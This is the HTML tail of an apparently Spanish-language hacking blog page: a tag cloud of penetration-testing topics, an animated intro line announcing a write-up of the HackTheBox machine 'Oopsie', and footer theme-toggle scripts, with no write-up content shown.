<a href="/tag/suid%2C/" class="set-1">SUID,</a> <a href="/tag/sam%2C/" class="set-1">Sam,</a> <a href="/tag/samba%2C/" class="set-1">Samba,</a> <a href="/tag/scheduler%2C/" class="set-1">Scheduler,</a> <a href="/tag/script%2C/" class="set-1">Script,</a> <a href="/tag/secretsdump.py%2C/" class="set-1">SecretsDump.py,</a> <a href="/tag/secretsdumps.py%2C/" class="set-1">Secretsdumps.py,</a> <a href="/tag/security%2C/" class="set-1">Security,</a> <a href="/tag/shares/" class="set-1">Shares</a> <a href="/tag/sharphound.ps1%2C/" class="set-1">SharpHound.ps1,</a> <a href="/tag/shellshock%2C/" class="set-1">ShellShock,</a> <a href="/tag/side/" class="set-1">Side</a> <a href="/tag/smart/" class="set-1">Smart</a> <a href="/tag/smb%2C/" class="set-1">Smb,</a> <a href="/tag/smbclient%2C/" class="set-1">SmbClient,</a> <a href="/tag/smbmap%2C/" class="set-1">SmbMap,</a> <a href="/tag/sqsh%2C/" class="set-1">Sqsh,</a> <a href="/tag/starting/" class="set-1">Starting</a> <a href="/tag/steganografia%2C/" class="set-1">Steganografia,</a> <a href="/tag/subdomains%2C/" class="set-1">Subdomains,</a> <a href="/tag/sudo/" class="set-1">Sudo</a> <a href="/tag/system%2C/" class="set-1">System,</a> <a href="/tag/thm%2C/" class="set-1">THM,</a> <a href="/tag/template/" class="set-1">Template</a> <a href="/tag/tmux-priv%2C/" class="set-1">Tmux-Priv,</a> <a href="/tag/tomcat/" class="set-1">Tomcat</a> <a href="/tag/tomcat%2C/" class="set-1">Tomcat,</a> <a href="/tag/transfer%2C/" class="set-1">Transfer,</a> <a href="/tag/transferencia/" class="set-1">Transferencia</a> <a href="/tag/tryhackme%2C/" class="set-1">TryHackMe,</a> <a href="/tag/ubuntu/" class="set-1">Ubuntu</a> <a href="/tag/unrealirc%2C/" class="set-1">UnRealIRC,</a> <a href="/tag/upload/" class="set-1">Upload</a> <a href="/tag/userenum%2C/" class="set-1">Userenum,</a> <a href="/tag/vnc/" class="set-1">VNC</a> <a href="/tag/web/" class="set-2">Web</a> <a href="/tag/web3%2C/" class="set-1">Web3,</a> <a href="/tag/webshell%2C/" class="set-1">Webshell,</a> <a href="/tag/wget/" class="set-1">Wget</a> <a href="/tag/winpeas%2C/" class="set-1">WinPeas,</a> <a href="/tag/windows/" class="set-1">Windows</a> <a href="/tag/windows%2C/" class="set-1">Windows,</a> <a href="/tag/wordpress%2C/" class="set-1">Wordpress,</a> <a href="/tag/wpscan%2C/" class="set-1">Wpscan,</a> <a href="/tag/writeup/" class="set-2">Writeup</a> <a href="/tag/writeup%2C/" class="set-3">Writeup,</a> <a href="/tag/x-forwarder-for%2C/" class="set-1">X-Forwarder-For,</a> <a href="/tag/xp_cmdshell%2C/" class="set-1">Xp_CmdShell,</a> <a href="/tag/xp_dirtree%2C/" class="set-1">Xp_dirtree,</a> <a href="/tag/ysoserial%2C/" class="set-1">Ysoserial,</a> <a href="/tag/zona%2C/" class="set-1">Zona,</a> <a href="/tag/zone/" class="set-1">Zone</a> <a href="/tag/app-js%2C/" class="set-1">app-js,</a> <a href="/tag/bashscript%2C/" class="set-1">bashscript,</a> <a href="/tag/chisel%2C/" class="set-1">chisel,</a> <a href="/tag/de/" class="set-1">de</a> <a href="/tag/dompdf%2C/" class="set-1">dompdf,</a> <a href="/tag/ecppt%2C/" class="set-1">eCPPT,</a> <a href="/tag/fcrackzip%2C/" class="set-1">fcrackzip,</a> <a href="/tag/html/" class="set-1">html</a> <a href="/tag/injecction/" class="set-1">injecction</a> <a href="/tag/msfvenom%2C/" class="set-1">msfvenom,</a> <a href="/tag/nmap%2C/" class="set-1">nmap,</a> <a href="/tag/pfsense%2C/" class="set-1">pfSense,</a> <a href="/tag/pfx2john%2C/" class="set-1">pfx2john,</a> <a href="/tag/phpliteadmin%2C/" class="set-1">phpLiteAdmin,</a> <a href="/tag/privesc/" class="set-1">privesc</a> <a href="/tag/privesc%2C/" class="set-1">privesc,</a> <a href="/tag/python%2C/" class="set-1">python,</a> <a href="/tag/redis-cli%2C/" class="set-1">redis-cli,</a> <a href="/tag/rsync%2C/" class="set-1">rsync,</a> <a href="/tag/smtpd%2C/" class="set-1">smtpd,</a> <a href="/tag/socat%2C/" class="set-1">socat,</a> <a href="/tag/squidproxy%2C/" class="set-1">squidproxy,</a> <a href="/tag/steghide%2C/" class="set-1">steghide,</a> <a href="/tag/tar%2C/" class="set-1">tar,</a> <a href="/tag/webdav%2C/" class="set-1">webdav,</a> <a href="/tag/welcome/" class="set-1">welcome</a> <a href="/tag/xss/" class="set-1">xss</a></div>
  




<script>
  let i = 0;
  const text = 'En esta ocasion empezaremos con el Writeup de la maquina de StartingPoint de HackTheBox llamada Oopsie';
  const speed = parseInt('50');
  
  function typeWriter() {
    if (i < text.length) {
      document.getElementById('animated-post-description').innerHTML += text.charAt(i);
      i++;
      setTimeout(typeWriter, speed);
    }
  }

  document.getElementById('animated-post-description').style.display = 'initial';
  typeWriter();
</script>

      </div>
    </main><footer class="site-footer">
  <div class="wrapper">
    <div class="credits"><a href="https://github.com/bitbrain/jekyll-dash">dash</a> theme for Jekyll by <a href="https://github.com/bitbrain">bitbrain</a> made with <i class="fas fa-heart"></i><div class="toggleWrapper">
    <input type="checkbox" class="dn" id="theme-toggle" onclick="modeSwitcher()" checked />
    <label for="theme-toggle" class="toggle">
    <span class="toggle__handler">
      <span class="crater crater--1"></span>
      <span class="crater crater--2"></span>
      <span class="crater crater--3"></span>
    </span>
        <span class="star star--1"></span>
        <span class="star star--2"></span>
        <span class="star star--3"></span>
        <span class="star star--4"></span>
        <span class="star star--5"></span>
        <span class="star star--6"></span>
    </label>
</div>
<script type="text/javascript">
const theme = localStorage.getItem('theme');

if (theme === "light") {
    document.documentElement.setAttribute('data-theme', 'light');
} else {
    document.documentElement.setAttribute('data-theme', 'dark');
}
const userPrefers = getComputedStyle(document.documentElement).getPropertyValue('content');

function activateDarkTheme() {
    document.getElementById('theme-toggle').checked = true;
    document.documentElement.setAttribute('data-theme', 'dark');
    document.documentElement.classList.add('theme--dark');
    document.documentElement.classList.remove('theme--light');
	document.getElementById("theme-toggle").className = 'light';
	window.localStorage.setItem('theme', 'dark');
}

function activateLightTheme() {
    document.getElementById('theme-toggle').checked = false;
    document.documentElement.setAttribute('data-theme', 'light');
    document.documentElement.classList.add('theme--light');
    document.documentElement.classList.remove('theme--dark');
	document.getElementById("theme-toggle").className = 'dark';
	window.localStorage.setItem('theme', 'light');
}

if (theme === "dark") {
    activateDarkTheme();
} else if (theme === "light") {
    activateLightTheme();
} else if  (userPrefers === "light") {
    activateDarkTheme();
} else {
    activateDarkTheme();
}

function modeSwitcher() {
	let currentMode = document.documentElement.getAttribute('data-theme');
	if (currentMode === "dark") {
	    activateLightTheme();
	} else {
	    activateDarkTheme();
	}
}
</script></div>
  </div>
</footer>


<script>
      window.FontAwesomeConfig = {
        searchPseudoElements: true
      }
    </script>
  </body>

</html>
